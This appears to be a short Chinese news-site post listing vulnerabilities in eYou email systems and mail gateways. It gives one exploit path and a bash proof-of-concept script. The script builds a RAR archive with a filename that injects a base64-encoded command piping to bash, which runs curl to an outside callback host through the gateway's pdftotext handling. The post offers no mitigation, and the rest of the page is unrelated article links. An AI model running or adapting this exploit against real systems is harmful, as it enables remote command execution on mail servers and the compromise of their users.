当前位置：首页 > news >正文

亿邮相关漏洞总结

news 2025/8/2 18:27:28

亿邮电子邮件系统远程命令执行漏洞
1. 　　疑似0day，未知详情
亿邮电子邮件系统认证逻辑缺陷
1. 　　利用路径：/?q=login.do

亿邮邮件网关 RCE

利用路径：/usr/local/eyou/gateway/ebaselib/bin/pdftotext

验证方式：

#!/bin/bash
PAYLOAD_NAME="testpoc.pdf\`{echo Y3VybCBodHRwOi8vc2R5eWE0Mm4uZG5zLmFkeXNlYy5jb20K}|{base64 -d}|bash\`"
WORKDIR=$(mktemp -d)
cd "$WORKDIR" || exit 1
echo -n "12345" > "$PAYLOAD_NAME"
OUTPUT_RAR="payload_testpoc.rar"
rar a -ma5 -m0 -ep "$OUTPUT_RAR" "$PAYLOAD_NAME"
mv "$OUTPUT_RAR" "$OLDPWD"
echo "[+] Done: $OUTPUT_RAR created."
rm -rf "$WORKDIR"

http://www.njgz.com.cn/news/318.html

相关文章：

使用DFU模式快速重装macOS15到macbook

大模型的JSON之殇：从脆弱的API调用到稳健的未来

[20250727]数论基本概念、最大公约数

读心与芯：我们与机器人的无限未来06问题或方案

使用Vue.js实现表单验证

HackerOne漏洞报告：AddTagToAssets操作中的IDOR漏洞分析

2025.7 广大附中集训游记

Cursor 远程主机无法下载 Python 插件解决

图灵奖和诺贝尔奖双料得主、AI教父Hinton教授国内首次演讲PPT全文实录

Chiplet封装技术全面介绍

HTTP响应处理的灵活设计(3844)

Hyperlane框架的高级特性深度解析：从零拷贝到宏系统的完美融合(8758)

跨平台Web服务开发的新选择(3436)

实时通信技术深度对比：WebSocket与SSE的最佳实践(8145)

高并发处理的Rust实现方案(3116)

现代Web服务器性能革命：我的Rust框架探索之旅(1806)

内存使用效率的终极对决：零拷贝技术的实战应用(6686)

从零开始构建高性能实时聊天系统：Hyperlane框架实战指南(1600)

延迟优化的极致追求：毫秒级响应的秘密(6608)

轻量级服务器架构的极致优化(1595)

2025年7月26日，6位书记校长同台！AI大会交大主场，超多成果重磅发布→

设计系统中的本地化集成：Figma变量与设计令牌实战

推荐6本书《MLIR编译器原理与实践》、《ONNX人工智能技术与开发实践》、《AI芯片开发核心技术详解》、《智能汽车传感器：原理设计应用》、《TVM编译器原理与实践》、《LLVM编译器原理与实践》

K8S常见的微服务中间件部署之Spark

推荐 6 款基于 .NET 开源的串口调试工具，调试效率提升利器！

Windows下使用批处理随机播放文件

【OpenGL】Triangle、VBO、VAO

,